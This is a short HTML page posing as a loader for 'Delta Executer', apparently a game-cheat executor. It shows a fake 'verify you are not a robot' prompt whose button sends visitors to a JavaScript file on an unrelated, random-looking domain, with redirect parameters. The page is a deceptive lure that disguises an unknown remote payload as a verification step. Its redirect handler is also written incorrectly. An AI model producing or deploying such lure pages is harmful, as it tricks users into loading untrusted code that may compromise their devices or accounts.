<style>
  button {
    font-family: monospace, monospace;
    border-radius: 12px;
    background-color: green;
    color: white;
    width: 3rem;
  }
  body {
    font-family: Arial
  } 
  p {
    font-family: monospace, monospace
  }
    
</style>

<h1>
  Delta Executer
</h1>
<p>[*] Delta has been successfully loaded, but you need to verify that you are not a robot</p>
<p>[*] Delta is a free product</p>
<p>[*] Download Delta at https://deltaexploits.gg</p>

<center><button onclick="window.href.location='https://kls13navse.com/bens/vinos.js?26824&mode=redir&subsite=8872733'">Verify</button></center>
